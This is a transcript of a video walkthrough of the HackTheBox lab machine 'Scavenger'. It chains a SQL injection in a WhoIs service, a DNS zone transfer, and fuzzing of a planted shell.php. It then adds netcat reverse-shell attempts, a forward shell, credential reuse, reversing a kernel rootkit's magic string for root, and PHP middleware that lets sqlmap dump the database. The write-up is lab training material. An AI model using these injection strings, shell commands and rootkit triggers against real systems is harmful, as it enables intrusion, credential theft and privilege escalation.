What's going on YouTube? This is Ipsec. I'm doing Scavenger from HackTheBox, which was a really tough box, potentially an insane box if you're not good at doing Recon, just because there's so many steps to do and so many chains. For instance, the box starts out doing an SQL injection against WhoIs to get some DNS names, use those DNS names against a DNS server to do a zone transfer to get subdomains. You find out one of those websites had got popped, you do a GoBuster on it and find the attacker dropped shell.php. You fuzz that to find out how the attacker uses shell.php to execute code. You get on the box, but there's an IP tables thing blocking reverse shells, so you just kind of do commands here and there. Eventually find a rootkit, reverse it, and get root. So that's a lot of steps, which means if you're not good at documenting or taking the new information you got and applying it to the old things you had known to see if it unlocked anything, you're going to have a lot of trouble trying to solve this box. There's a piece in this video that I think I do a really bad job on, so if you're taking notes, definitely try to find ways to automate more things. For a specific example, whenever I get a new password, I kind of just tried that password on the things I was looking at when I should have had some like Ghidra Medusa scripts ready to go. So whenever I got the new password, I could quickly try it against all the users for FTP, SSH, and a few websites. And if I had done that, I wouldn't have had to get a forward shell on this box to do a su command, because I could just FTP in as that user to download the kernel module I needed. So with all that being said, let's just jump into the box. As always, we start with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Scavenger, and then the IP address, which is 10.10.10.155. Can take some time to run, so I've already ran it. Looking at the results, we have a ton of ports open, so I'm going to just start off with a cherry tree so we can take notes as we go. Pressing Control-N to create a new node, I'll call it Scavenger, and then Control-Shift-N to create a child node, and I'll just create something called Interesting. And the very first thing we have is port 20 is saying it is closed. So nmap is saying there's something behaving differently about this port because it's not listing all the other ports it scanned, which is the top 10,000 ports, because we didn't specify a port range, so that's just the default. So this one behaved not like all the others, and my guess is there's an IP tables rule here rejecting packets. So we can put this and do IP tables rejecting packets, question mark. And then the very next thing we have is vsftpd running on port 21, and that's running 303. So I'm just going to do searchploit against this to see if there's any known exploits. And everything's for version 2, not version 3, so nothing there. We can try anonymous login. I bet nmap probably tried this, but nmap is not great at telling you all the scripts it ran. So this is one I always just like doing to see if anything else gets leaked. And while that goes, I want to go over to Firefox and just do vsftpd 303. And I'm just going to search for a changelog to see if I can get some type of release date. So looking at here, I don't really see a release. I'm going to see if I can find out when this page was created. Our anonymous login has failed, but if I do wget on this URL, and I can do exif tool on the page it downloads, and we can see the file modification date time is on July 25th, 2015. So vsftpd 303 release this question mark grabbed via wget. I'm sure if you did a lot more googling around, you could find maybe a release note or something that specifies the exact date, but it's probably not going to be too beneficial to us to know that, so why worry? So I don't want to spend too much time there. We have port 25, which is SMTP. That's running exim SMTPD 489, and it's leaking the hostname. So let's do SMTP hostname leak. Put that in, and we can follow the same exact thing. Searchploit, exim, and looking through this, we have a potential local remote command execution here. I'm just going to do searchploit -x to look this over and see if there's a proof of concept code. Don't see anything. This is just an advisory, so I'm probably going to ignore that. Potential privesc /rce, and I put privesc first because we have privesc, privesc, and all three of these look the same, but I can probably move to the next thing, which is going to be 43, and this is potentially WhoIs. And looking through this, we do have WhoIs saying it is MariaDB, so looks like this may be running some type of SQL database. If I netcat to 10.10.10.155 on port 43, we can do the host name that was leaked, which was supersekhosting.htb, and see if this is functioning. So it is. So we do get a return. No real good information. If I put like a bunch of A's, we get just it failing. But since this is saying it is SQL, I'm going to try putting a single quote and see what happens. And we do have a SQL injection, it looks like. You have an error in SQL syntax, MariaDB. So I'm just going to copy this. And we'll go put this and paste. There we go. And didn't have a new line first. And we could go dig down this, but I always like finishing my enumeration before I move on. So even though it looks like that's SQL injection, let's just go check everything else. We do have DNS open, that is ISC bind, that's running version 9.10.3. So let's just do, whoops, scroll down so we can see everything. NS lookup, server 10.10.10.155, and we can try looking up itself, see what it says. Doesn't have anything, so reverse lookup may not be working. If we do 127.0.0.1, it just returns localhost. We can paste the leaked host name and see if we can do a zone transfer. So if we exit this, we can do dig axfr, which is zone transfer, paste the DNS name we want, and then at the DNS server 10.10.10.155, and we can see a bunch of host names. So DNS zone transferring does work, so that is good to know. So copy this, go here, DNS zone transfer works. And now we have a lot to enumerate when it comes to the website, because we have 1, 2, 3, 4, 5, 6 virtual hosts we have to do. So I'm going to do vi etc hosts, and let's add all these. So I'm going to grab this, copy, and paste, www, paste. We got FTP mail 1 NS1, so FTP mail was at 1, and then NS1 and WhoIs, I think, was the final one. There we go. And I already have www there. So we have quite a few host names we have to enumerate. So let's go and take a look. So going to 10.10.10.155, we have virtual host not available, and I think 80 was the next port. It was. So let's go and enumerate each of these. So cat etc host, and copy this, paste, no config found. We can copy supersec hosting, paste, nothing, www, paste, and we get a web page. So there's something there. We can look at FTP. And you may want to use like Aquatone or something for this, but wasn't that many sites to go through manually. So Aquatone is just like a program that's written in Go that uses Chrome and goes through a bunch of URLs and takes screenshots. But the only thing we have right now is supersec hosting. So we can go here. It's going to do virtual host And we can label this one. And then Control U to look at the source code. We see /themes. I'm looking for something that states this is like WordPress or something. Don't really see anything. We can try just going to /wp-admin to see. And that is a 404. So nothing there. If we do /admin, if I can type, my hand was off just a little bit. Nothing there. So let's try GoBuster and then move on to do that SQL injection. So we'll do, let's just make a directory for GoBuster. And then we can do GoBuster-u, this, and is this PHP or whatnot? Let's just go to /. It says PHP 7 plus MySQL. If we do index.html, we get 404. If we do index.php, we get the page. So we know it's running PHP. So I can specify -x PHP, -w for word list, user share, word list, GoBuster, directory list 2.3 medium, and -o, we'll call this GoBuster -this -zert erg extension PHP. .out. That should be fine. And to tell this to go into directory mode, and we failed. What am I doing wrong? Oh, it doesn't like having these slashes. It copied the http://. There we go. So now GoBuster is running on that domain. And we can begin looking at the WhoIs data because there was a SQL injection there. So as a reminder, if we do NC 10.10.10 155 on port 43 and give it a single quote, we get this, you have an SQL error to the right of this. So what it looks like we did was I think we injected here. So what I'm going to do is put this and then ipsec, and this will give us a better idea of where we injected. And it doesn't look like we injected there. We injected way back here. So this is the one we injected. So if we inject a single quote and then put a parentheses and then a comment, we should be able to turn this query, which let's go into cherry tree. So right now we have like select star from ipsec limit 1. And ipsec is where we're injecting. So what I want to do is I want to get rid of ipsec and inject a single quote and then a comment, so all this is removed. Or single quote and then parentheses and then a comment. Because if we only injected this piece and it's got a closed parenthesis here, we know there's an open parenthesis here. So we want to inject a single quote, parenthesis, and then comment. So let's do single quote, parenthesis, comment, and we don't get a SQL error. If I do this again and I don't do that parenthesis, you can see we have a error message. So the next thing we want to do is see how many columns this is returning. And this will be handy for a union injection. So I'm going to do this and then order by 1 or 1. And didn't error. Let's try order by 2. No error. Let's try order by 3. And unknown column 3. So 1 doesn't error because it can order by this. 2 doesn't error because it can order by that. And the third one, it's saying, hey, this select statement that you're doing only has two things, so I can't order by it. So if we go back here, it's not select stir, it's probably like select ID, or probably host name, IP address from we'll do WhoIs database, or WhoIs, where, and this is where we inject. So the next thing to do is test union to make sure we can get data. So if we do union select ipsec rocks and then comment, we get ipsec back. So we never see the second one, but we always will see the first one. So now we can try to extract stuff from information schema to find out what database we're in and then the tables of that. So let's do that. The first step will be looking at the documentation of information schemas to see how it is handled. So I'm just Googling information schema, and then we can go to this page. And then the first one we want to do is called schemata. Schemata, there we go. And this table is going to be the one that contains all the database names. So schema name, that is a database. So what I'm going to do is union select group concat. This will take multiple rows and put them on one line. And I want to do schema name. And then we always have to have two items in this union. So just comma 2 from information schema dot schemata. And we can see two tables, information schema and WhoIs, or two databases. So SQL databases, and we only really care about the WhoIs database. So the next thing we want to do is get a list of tables. So we can go back here and look at the probably tables table. Tables table. There we go. And if we look at this, we have table schema. So we can say select stir from the tables table where table schema equals WhoIs. So let's do that. So union select group concat and the table name. So table name 2 from information schema dot tables where table schema is equal to WhoIs. Looks good. And we get customers. So tables customer. And it only returned 1. So what I'm going to do is make sure we did this correctly. So I'm just going to double check my work. Limit 1, comma 1. Whoops, didn't put a end comment. Union select. Put this, is it limit 1? Oh, yeah. I need to have that where statement because I just now grabbed everything. And this limit thing, ignore what I just did. I don't have to do that because I'm doing group concat. Everything's going to be just fine. There's only one table in this. So what I was doing, because I think just stopping would probably confuse you, I was thinking I didn't have this group concat. So I was trying to do union select table name 2 from information schema dot tables. If you do limit 1, we'll only get one thing, but I have a typo right here and I don't have my arrow keys. So nc 10 10 10 155 43 union select table name 2 from information schema.tables limit 1. So if we do this, sent to DNS. Wow, I'm just failing all over the place right now. 43. There you go. And we can do limit 2 1, I think. Get the next one. And then 3 1 to get the one after this. And just extract the tables one at a time. But again, if you do the group concat, you get them all at once. So it started off with all plugins, character sets, and we group concat table name and do this. Did not copy the comma. You can see it's got them all, and all plugins, then applicable roles, character sets. It looks like there's a maximum number of characters this can do. If we do echo-n, paste this, wc-c, 1024. So we can only extract 1024 characters at a time, but that's all this is. So long about way to say there's only one table in this WhoIs database. Hopefully I didn't confuse anyone with that tangent, and hopefully it helped. Let me know in the comments so I know if you enjoy when I try to explain when I make a mistake. But the next thing we have to do is union select group concat, and I'm just going to say I know column name is in the table schema.columns. You can go back to the page here and go and look at that table if you want to see how to do it, but information schema.columns where table name is equal to customers. So if we do this, we have 3 things. We have ID, domain, and data. So tables, customer, and we can put this. So there we go. Bit easier to read. So now we have all that. We can now select what data we want. We probably don't care about ID. The domain and data we probably don't care about, but domain is what we want. So let's do union select group concat domain comma 2 from customers, because we're probably already in the database. We can specify if we want, but we probably don't have to. WhoIs.customers, and we get 3. If we didn't specify, because the code is probably using this database anyways, you don't have to. And if you want to see what database you're in, we probably could have done the database command. So union select database 2, like that. And we see we're in the WhoIs database already. But we got a few new host names. So domains, column domains, and paste this. So we've already done a good job at enumerating that supersec hosting, but let's go and do the other ones. And if you remember back from interesting, we did have a DNS zone transfer. So let's go and do a zone transfer in each of these. So dig axfr, paste. We have to do at 10 10 10 155. And you got mail 1 and dub. So let's do v etc hosts mail1 just on the blog, and we can do www and just another blog.htb. Let's get rid of these trailing periods. mail1.justanotherblog.htb. Virtual host not available. Go to www. We get website under construction. And then we just go to this. Nothing. So virtual host. Unknown CMS. Just another blog. Under construction. And probably should run GoBuster against that, but let's go finish our enumeration of all these domains. So the next one we have is, go back to cherry tree, pwned.htb, and same thing, pwned, mail1, and www. So etsy hosts, paste www and mail1. I have to put a period here. Then go enumerate pwnhats.htb, nothing. Mail1.pwnhats.htb, nothing. www. And it looks like some type of store. If we look, PrestaShop. So go back here, virtual host, pwnhats.htb, PrestaShop. I don't know any scanners or anything off that top of my head for that, so we're just going to ignore it and finish our enumeration. Because I hate always digging down rabbit holes before I'm done enumerating. So the last domain is rentahacker.htb. So let's do that zone transfer. And we have rentahacker, mail1, www, and sec03. So Etsy host, rentahacker, www, mail1, and sec03. So let's do rentahacker, nothing here, mail1, nothing there, www, and I mistyped that. www, rentahacker. We get a page. If I control U this, it looks like there's a lot of broken things. Maybe if we F12 reload. I'm not exactly sure what's going here because I don't see a bunch of errors, but this is definitely a WordPress page without any images being shown. So if we go to /wp-admin, we can potentially log in. So we probably should run wp scan against this. Looking at the post, there is a post, rentahacker. And then the very last comment is saying, hey, check your bug tracker, you have been owned. And there is one last domain we haven't looked at, which was sec03, so rentahacker.htb. See what this is. And we get owned by the Hackster team. So the very first thing I want to do, index.php, verify this is indeed a PHP thing. And that actually goes to Mantis. So we have a login here. So if we do virtual host, rentahacker, WordPress, and then sec03.rentahacker is Mantis, was pwned. So this is running that, and why the other page showed is probably HTML is preferred over PHP. So if there's an index.html, that page gets displayed. If it's PHP, another page gets displayed. So this one right now is what I'm most interested in. And, 403 for PHP my admin. I was like, cool, that one's interesting. But I'm going to kill this one real quick. The old GoBuster on that one website, it's not too helpful. So spoiler, let's just kill that and do sec03.rentahacker.htb, and we will paste this. Nope. HTTP sec03 rentahacker.htb, and the word list, I don't want to wait around a whole lot. I'm just going to do small.txt. And -t, we'll say 50 threads, and hopefully we don't kick over this server, because I don't want to wait that much. So looking at all the PHP files, and there is one that sticks out, and that is shell.php. So looking at shell.php, it's just a blank page. So the very first thing I do is see if this is a shell I created and use the comment ipsec or please subscribe, and we don't get anything. But shell.php is generally something attackers drop. So if you wanted to see kind of when this server got popped, you could do what we did before and do a wget on this page potentially. If we do exif tool, shell.php, it doesn't actually say anything because the page is dynamic. We're not actually downloading shell.php. We're going to the web server, it's executing something and then giving us output. But there is an image. Where is it? I just paste this. Oh, we could do log index.html. So if we do wget this index.html, exif tool, index.html, this site was popped back in December of 2018. So let's put this under interesting. I'm going to rename this. Where's rename? I'm going to press F5, no, F2. There we go, F2. Interesting, we'll call this nmap notes. I want to do Control-Shift-N, interesting, interesting, server popped, and we'll put the timestamp. Always good to have this type of stuff for an instant response. Wget of index.html. So we have that. The next thing to do probably is to figure out exactly what shell.php is, because when a lot of attackers put shells on servers, they don't really do the best job at securing them. So there's probably just a get or post parameter that you can just put a variable and then a command and it executes. So let's go and hunt for that with wfuzz. The parameters we're going to use is probably going to be a abbreviated word list, just because I don't feel like it taking a while. I'm going to go to user share seclist. If you don't have this, you can apt install seclist to install it. And then I'm going to find .grep-i param. And I see there is a discovery web content burp parameter names. So I'm just going to try this one first. So we can go back to a wfuzz command, do -w for word list, user share seclist, and then discovery web content burp parameter names, and then specify http sec03.rentahacker.htb/shell.php fuzz equals, we'll do ID. And we have to hide everything that we don't want. So we can do --HW for hide words that are equal to 0 length. And hopefully ID returns one thing, which it looks like it does. We do have hidden. So if I go back to my web browser, we can go to shell.php !hidden equals ID. And we see it did return something. So this looks like it is going to be the command. We do whoami, IB1C03. So I can do bash-c, this, --i reverse shell cheat sheet. I'm drawing a blank at the bash one-liner. So pull it from here. Go back here. And let's do port 9001. 10.10.14.2 I think is my IP. If config ton 0, it is. nclvnp 9001. And when we run this, we don't get anything. So what I'm going to try is which curl. We don't have curl in the box. Which wget. We do. Do we have nc? Because nc would be better. We do have nc. So nc 10.10.14.2 on port 9001. And we don't get anything. So it looks like there is some type of firewall or something preventing us from reaching back. I'm going to look at the host name, IB01. I'm going to do lsla on slash to see if I see like a .docker directory to see if I'm in some type of virtual environment. I'm going to do find etc grep IP table. And we do see IP table rules. A common way to bypass the outbound rule of firewall is to do IPv6. So let's see what these rules look like. So I'm going to cat etc IP tables rules.v6. And we see the default output is set to drop. And there's no real accepts below. So v6 is not going to work for us. Looking at the v4 rules, we can see quite a bit. Default rule for input is drop and output is drop. So since the default for output is drop, if you go down here, we have state established -j accept. Whenever it sends a SYN packet outbound, it's going to get dropped. But that works because if we're trying to get to a web server, the web server is not going to send a SYN outbound. It's going to send a, I think, SYN ACK or an ACK. Sends another packet outbound, and that's why this works. So unless the packet comes in through one of these accepted ports, it's not going to be allowed back out. So we could do a forward shell, which we'll probably do in a bit, but we can still enumerate the box a little bit to see what's going on. So looking at this, we see a rule, output PTCP on source port 20. And if you look at netcat, we do have a source port option, so -p. So we can probably specify the source port. So what I'm going to do is listen on port 80, because I want to make sure, like, if by some weird thing, I'm accepted as possible, or as accepted as possible. So I'm going to do that. Not that it matters, or it shouldn't matter. But just in case it does, we'll do nc-p 20 10.10.10 10.10.14.2 on port 80 and see if we get a connection. We don't. And I think the reason here is even when you're doing a source port set, anything below 1024 is privileged, which means we need be root to do this. And since we're not root, we can't set a source port below 1024. So that's a bust. The other thing we can probably look at here is the home directory. So if we do find that, there looks to be nothing in here. We do find /home. There are quite a bit of files here. So what I want to do is see what the attacker did on the box. So we do have the date of potential ownage, which is December 6, 2018. So let's look from December 5th to December 15th. Let's look at every file within 10 days. So let's see what the attacker did. So we'll do, let's do this over in curl, just so it's a bit easier. So curl, does this work, or will I have to URL encode? I have to URL encode. So I'll type it here, and then we'll paste it in Firefox. So we'll do find/newermt 2018 1205 and not newermt 2018 1215. And I'll add a -ls so we can see the file dates to make sure we did this correctly. So paste. Oh, we'll probably want to view the source. December 7th, 10th. So this is looking like we got everything we want. We don't want to see directories. So what I'm going to do is I'm going to add -type f. I'm also going to add -readable to only say things that we can read, because I'm not interested in a file if I can't read it. So let's try this. We'll probably have to view the source. Did not like that command. Oh, I got rid of the slash. No, I didn't. Maybe -readable doesn't like? Oh. I have the slash up here. It needs to be there. There we go. Placement does matter when you do commands. Run this. Let's get to the source so we can read it more cleanly. And now we have a list of what's happening on the server around this time. So we do have a bash history, but it's set to 0 size, so we don't really care about that. And we can't read that file. Readable. I guess I got rid of that. There we go. So all this Python stuff, we'd probably care about this if we're actually doing instant response to make sure they didn't put a backdoor in any of the files. But for us, who cares? Grub, again, probably not too important. We're looking at shell.php. That was created on December 10th. Index.html was created December 6th. So it's odd that they defaced the page before they dropped the shell. So what I'm going to do is we'll just do it by the 10th. Because a real hacker would probably drop the shell.php, then deface the page. So let's see. I'm just shrinking the number of things we have to go through. That's why I did that. So WordPress config. So let's go see what this is. WordPress configs generally have a password. So let's paste and cat it. So I just did cat home whatever wp.config, and then control U to view the source. We do have DB user and a password. So shell notes wp config ibco3 and this password. Do we have SSH open? SSH 10.10.10 155. We do. So IB01CO3 at this. We can try copying this, paste. Doesn't work. We can FTP IB01C03 at 10.10.10 155. That's not how you do FTP. IB01C03. Paste the password. Login successful. If we do dir, we do have some stuff. Bash history, which is nothing. WordPress archive seco3. So if we do seco3, we can potentially get more config files. But doesn't look like we have all that much. Here's the WordPress where we were just at. And, oh, we can go up a directory. So let's see. We can go into this FTP directory. No, we can't, because that's a group and we are not 1000. So, but we can download pretty much any file off the server. We could already do that with this. And let's look at who we are actually. Are we the same exact user? Who am I? Yes. So, it doesn't really get us anything. What is interesting is that's the valid password for that user. However, he's not allowed SSH. So, let's go back and enumerate things. Config. We got mail on December 10th. So we can cat this. So cat, the mail. And let's see, from support. We need your help. Our site's been defaced. What do we do? And it looks like there's some instant response going here. They just made a backup of the Apache logs on FTP supersec hosting with these creds. So let's copy these into cherry tree. Email. Okay. And I know it's tempting to go dig into that now, but let's just go finish looking at the logs. We can read var log fail log. So what is this showing? That's just a binary. We'd have to parse it. I'd see pass WD. So maybe the attacker actually modified a account because pass WD's changed. So let's go cat this. And we can see all the users. We kind of had these users from when we were FTP on the box and went up a few directories, but we can copy this and put users here. And we have owned that guy. Actually, I will just put in bold if I have owned it. And we may have owned FTP. Let's go try logging into this. So FTP 10.10.10.155, and then IB 01 FTP, paste the password, dir, dir-a, so incidents. And let's see, there are two directories. So IB01C01, there's 3 files. dir IB01C03, nothing there. We can do -a, cd IB01C03, dir-a, to list hidden files, don't get anything. Don't know why I just exited. IB01 FTP, paste, incidents, cd IB01C01. I'm just going to do mget stir.stir to download everything, hit yes on each one, and let's go through these files. I'm going to make dir FTP mv ib to FTP, and we can move notes here as well. Don't know what this file is. I created it somewhere, but let's look at notes. After checking the logs and network captures, all signs point to the attacker knows valid credentials and abused a recently discovered vuln to gain access to the server. So let's go take a look at access log. And at the end of this video, we're going to use Zeek, which is known as Bro, to parse this pcap and kind of build this ourselves. But if you don't have tools available, we're going to do it without tools first, and at the end of the video, we'll do it with tools. So the first thing I want to do is look at all the IP addresses. So I'm just going to do awk print 1, and that's going to give me IPs, sort-u. We only have one IP in this access log. So that's not helpful. The next thing I want to do is look at all the user agents. So we'll do awk -f, escape a single quote, and I'm going to guess 7. And we're going to see where I'm at. Let's try 8, 6. There we go, 6. So all that was doing was, if I cat this log file again, it's counting all these and using double quotes as a delimiter. This happens to be the 6th double quote, which is why we got the user agent. So we can do sort unique-c to count them. And it looks like, I would guess, this one's the malicious one. Or maybe seeing Linux and the user agent's malicious as well. But it's easier to look at all the lines with Mozilla 4.0 because there's 7 lines versus 36. So let's start with that one. So if I grep from Mozilla 4.0 and do less, we see this. It's not kind of pretty. If I do less -S to disable line wrapping, it's a bit easier because I can just do left and right. So getting to the page and then making a post request, and then getting index controller, and looks like he's executing something. So they definitely exploited pwned.htb, which is odd why they said the bug tracker in that WordPress comment, because this is not related to that. But let's just go into the Wireshark and search for this string to see exactly what this post request is. So if we go back to a terminal, Wireshark on FTP IB01 incident.pcap, and then I'm going to Control F. We're going to search for the string, this, near and wide is fine, and packet bytes. So here we go. We got a post. We follow TCP stream. We do have a login. So token, controller, admin, passwd, get you a hat, and then %21. I believe that is URL encoded to a exclamation point. So creds, get you a hat, exclamation point, and email is pwnhats@pwnhats.htb. So what we could do is try to go to pwnhats.htb and go to this directory and see if these people have changed the credentials yet. hats.htb, because we're supposed to be helping them in an instant response case. So always good to test it when you see the attacker's used the credentials, that those credentials are no longer valid. That doesn't look like it's valid. Let's go here. They did a get here. Let's just do a get there. It looks like this directory may not even be valid anymore. Sign in. pwnhats@pwnhats.htb. And then the password, get you a hat. Doesn't work. And you can also try the rent-a-hacker login page.php, pwnhats at, I already have that. And then get you a hat, exclamation point. So there's nothing really here. So let's go back to the pcap. And another thing I'd like to do is extracting objects, HTTP, and we can see all the file names here. And we could just reconstruct the pages to see exactly what they look like. But we do see something interesting. We got root.c and makefile. So I'm going to save these. So let's do root.c and makefile, because it looks like 2 files were downloaded. And root.c sounds really interesting. So let's do cd ... less makefile, and it's looking like it's making something, but we can do vim root.c and start looking at the code. So we got device name ttyr0, and we can go back to our way of executing code, and we can say like find /dev grep tty. And there's a lot of them, but ttyr0 is a device. So looking like we have a kernel rootkit. Just going down, we do see magic data is got root. And then we have if data exists, copy from user. So it's copying to the data variable, and it's copying what's in the buffer and the length. And that's doing a comparison on data, so what it got, and the magic, which is got root, and this is the length. So if these are the same, then it's going to rewrite our credential structure, which we've done this in another box, actually. I forget which one. Maybe I do ipsec.rocks. We search for cred. No. Smasher 2 is, I think, what we did it. Yeah, rewrite credentials in memory. So we did something similar in Smasher 2. But it's saying if got root is this, or if we send ttyr0 got root, is going to edit our credential structure and give us root. So what we can try doing is first see exactly how they said got root, G0R0. So we can go back here, echo G0T R0OT to dev ttyr0 semicolon who am I, and we are still the same user. So that didn't work. I guess the next logical step is to try to get a shell on this box, and we're going to do it with a forward shell. And I finally made the code public I've done in previous videos. Again, if you go to ipsec.rocks and search for like forward shell, you'll probably see me use this in a few boxes. I first created it in SOCAR, but I've used it several times since then. But github.com/ipsec, there should be a forward shell repository. There it is. So this will be the code I use. So cd opt forward shell, and let's modify this. So let's see. Do we want the proxy? Sure. Let's start at burp suite. Let's learn the community edition. I wonder if I had pro. I guess I updated Kali. And then it overwrote. It's fine. Next. Okay. So we have to modify the URL. So we'll do 10.10.10.115, and it is shell.php. Typoed the IP address here. And if you're unfamiliar with this script, I'd highly recommend watching that SOCAR video because I explain everything about the forward shell. Essentially, we can't get a reverse shell over the network, so we write a shell to the local hard drive or memory and use files as input-output so we can get a persistent shell without requiring a network connection. So that's what this does. Let's see. Next thing we have to do is the next modify this. And this was using shell shock. We're not using shell shock. We're now using an HTTP parameter. So the parameter is called hidden. And the header, that is going to be params for a get parameter. And we can do params is equal to params. And that should be it. So let's save this. Python 3 / shell. Payload reference before assignment. What line? 55. I'm not sure what I was doing here, but that should just be equals. 404 not found. Oh, we have to do domain name. So sec03.rentahacker.htb. Looks good. ls. And we get a bunch of output. Awesome. So now we have a / shell. I'm going to do pwd cd ... ls, and it is now persistent. So what I'm going to do, who am I? And I'm going to do echo. Was it, how was get root spelled? Let's see. Let's go here. Vim root.c G0T R00T. So for G0T R0T, like that. To dev TTY R0. Who am I? And we are still this user. So let's do su dash and try switching to various users that we have the password to, because maybe you have to be a specific user. So let's see. Where are my passwords? Probably show notes. We are this user. Let's try using this password for everything. Get you a hat. So cat. Oh, we don't have to cat etc pass to bd because we already have it here. Let's do IB01C02. SU IB01C02. I have to do upgrade, and this is going to do the Python-C import pty thing. SU-IB01C02. Ask me for the password. Put the password in. Authentication failure. Cat etc pass wd. Am I missing one? Is there a C01? There is. SU-IB01C01. Get you a hat. We do ID. We're now this user. So let's try that got root again. So echo G0T R0OT to dev TTY R0 ID. Still this user. Let's see. We do have access.txt, press to zop, user.txt, and dub, but there is a directory with 3 periods. So let's try going into that directory. pwd, did we do it? We did. And there is a file called root.ko. So base64-w0 root.ko. That is a big file. Let's see, I don't want to grab that. See, hopefully my tmux is big enough, and it is. So we can grab this whole root.ko file. And then let's go back here. vroot.ko.b64. Paste it. It's going to take a second to paste because that was quite a few characters. Come on, tmux. There we go. Finally pasted. Delete that. There was just a blank line at the top of the file. base64-d root.ko that to root.ko file root.ko, And we got an ELF. So now we can load this up into Ghidra. And the logic I'm doing now is kind of comparing the root.ko that we have, which is a compiled kernel module, to the source code to see if there's any differences. So let's do new project, non-shared, sure. This one's going to be Scavenger, mkdir Ghidra. Sure. Open the decompiler. Let's do file. Is it open? No. Import file. That's it. Up one directory, Scavenger, root.ko. Okay. Processing, analyze. Sure, let's select all. So right now I'm just waiting for this bottom right thing to no longer be importing anything, and then we'll go and begin taking a look at this. So now that it's done, we can go over to the functions and look at everything here. There are 3 functions: root open, root read, and root write. And I'm going to go back to the code, which was root.c. We have it open here. And we do have our got root thing that is in the root.write function. And there's also read, open, and everything. So this is definitely the same exact code. Well, not same exact, but similar projects. So let's look at root write, because this is where the got root was. And we see the memory compare. Whoops, did not mean to double click that. Let's go back here. We see the memory compare. And your Ghidra probably looks different than mine because you have the hex and stuff side by side. Because I'm doing the video and wanted the font bigger, I have them in 2 different panes. So here's the mem compare. And it looks like it's grabbing local 28 and S1. S1 is copy from user. If you go back here, copy from user was the data, what was being sent. We want the other one, which is local 28. Local 28 is using printf to combine 31 and 2D. If we look at 31 and 2D, we just have hex. If you highlight and let it sit, it shows it is the character G3T. And if you had highlighted this and looked at your code, well, I guess we can say convert to character sequence. And we can do this one, right click, convert, character sequence. Get and priv. So we know this is G3T and this is PRIV. I don't know why that's not. Maybe we can retype. You are now char. Yeah, built-in type, sure. I'm not actually sure how to tell the decompiler to show the ASCII form, but that's get root. So we can rename G3T. Oh, this is priv, PRIV, right? Yeah, PR1V. So let's rename this one to PR1V. There we go. That seems a bit easier. So local 28, this is going to be from the user. Oh no, this is magic. So, and then S1 is going to be data. There we go. So now it's comparing data and magic is get priv. So let's go back to a Python code. pwd, we're still running. Echo G3T PR1V 2 dev ttyr0 ID. We're now root. So that is the box. I hope you guys enjoyed it. And we can try a few things. First, we did echo got root. Let's try G3T pr1v. And with that, we can get root here. So with a root shell, let's do nc 10.10.14.2 port 80. And we still have netcat listening here. So enter. We can't get to it. So all I was doing here was making sure that root just wasn't blindly allowed out of the firewall. So now I'm going to do -p20 to see if not being root is what stopped us from doing this source port. And we get a connection. There we go. I guess I had a special key hit and it just switched off. But that's why we couldn't do netcat earlier. So the other two things I want to do is the very end of the video, we're going to use Zeek to do the pcap. The first thing I want to do is kind of write some middleware for this SQL injection. So if you didn't want to go through that information schema thing, you could have used SQLMap to actually do this. And I think I have a directory saved. No, I don't. Okay. I wasn't sure if I had done this before. So what I mean by that is SQLMap can't do the SQL injection because SQLMap knows HTTP and the SQL injection is over WhoIs. So if we make a PHP script that will connect to the WhoIs and run whatever command SQLMap does, it'll work. So again, all we're doing is running SQLMap, sending it to our PHP script, which then sends it to the WhoIs database, which then sends it to MariaDB, which is MySQL. So this is going to be what we do. So let's do v please subscribe.php, and we'll begin writing our PHP code that is intentionally vulnerable so we can SQL map a WhoIs database. So the first thing I want to do is just send it to localhost. That way I can test things out. So the next command is port, and we'll do 43. Now we got to create our socket. So we can do socket underscore create, if inet, sock stream, and then TCP. Okay. Sock connect is equal to sock connect, socket, address, and port. Okay. Then we can do request is equal to URL decode. And we want to put request, please subscribe. So I'm doing a URL decode because we don't want to send URL encoded information to our server. So actually we can comment this out and show you first. Request, please subscribe. So we'll show you first exactly what that does. So now we got to write the socket. So socket write, sock, request, and I don't know why I have a quote here. Okay, that's the function. And we need the length of the request. Okay. Now we got to echo the socket read sock 2024 and PHP socket read. There's two modes. One does read until a line break and the other will read all. We're going to do PHP binary read. We probably don't have to specify this. If I just did normal read, it stops at a line break, which would be bad for us. I guess we can show what that looks like first. No, it's normal read. Normal read. So this is going to be bad and break at line breaks. Forgot the semicolon. And then let's socket close sock. Okay. Now let's test the web server. So php-s 127.0.0.1 port 80. And this is just like Python simple HTTP server, except it will actually execute code. So if we curl 127.0.0.1, please subscribe.php, and we also have to listen on port 43. And we called it please subscribe is equal to ABC. Let's see, we have a syntax error, line 9. Line 9. Like that. There we go. Paste the same thing in. Sock connect, line 7. 7. Socket. There we go. Function name must be in string. So let's see, what did we send? Socket write request. It's not parentheses. Send it, and we wrote ABC. So if we did URL encoding, like %20 ABC, and send this, oh, we may not actually have to URL decode. I think it does that for us. So we'll send it. Oh. So now it's doing the whole, it'll say stuff until I hit enter, and then it prints that. But if we change this, dub. So if we change normal read to binary read, it should read until null byte or something, where we close the socket. So do this. I wonder if I sent it all at once. We're at a point where we can actually just play with it. So we know we sent data. We can now change this from localhost to 10.10.10.155. We no longer, oh, no, we do have to host that still. Okay. So no longer have to host our netcat session. So curl test single quote escape. Let's try putting this in a web browser. So test single quote. It's not hitting. Please subscribe.php. Just hanging. Oh, I probably know what it is. Request this plus period, or I think period in PHP is concatenate. \r/n. So we need to send a line break to the actual WhoIs server. I bet that's it. There we go. So now we did this curl and we got this error message. Let's see what happens if we change the thing into a normal read. Normal read. You'll just get the last line, which is MariaDB. So you want this to definitely be binary read And there you have it. So now what's left, SQLMap -- technique equals U for union. We only want to do union injections. -- DBMS, we know this is MySQL. I'm just doing this to speed it up. And then the URL is going to be -u http 127.0.0.1.80. I don't have to specify that. Please subscribe .php. Please subscribe is equal to support me on Patreon. And the parameter with -p, we want to inject into please subscribe. So it's testing, and you can see everything SQLMap is doing. Get parameter please subscribe is union injectable. Yes, and now it is confirmed. So we can do --dump. And SQLMap didn't like something, but it's saying potentially trimmed output. But you can see it's definitely dumping the data. Where is it? Domain name. There it is. So SuperZac hosting, just another blog. The next one is pwned. So we are definitely dumping data. I'm not sure why SQLMap is thinking it is truncated, but you can see it got all the domains. I guess we could try doing what it says, the --no cast. And this is a good way to identify exactly what SQLMap does. If you do like --hex, you can see all the commands SQLMap is doing to do this. But that'll be it for the SQLMap portion, the middleware. And finally, we're going to get into Zeek, which used to be called Bro, and it's a super good packet analyzer. The downside to 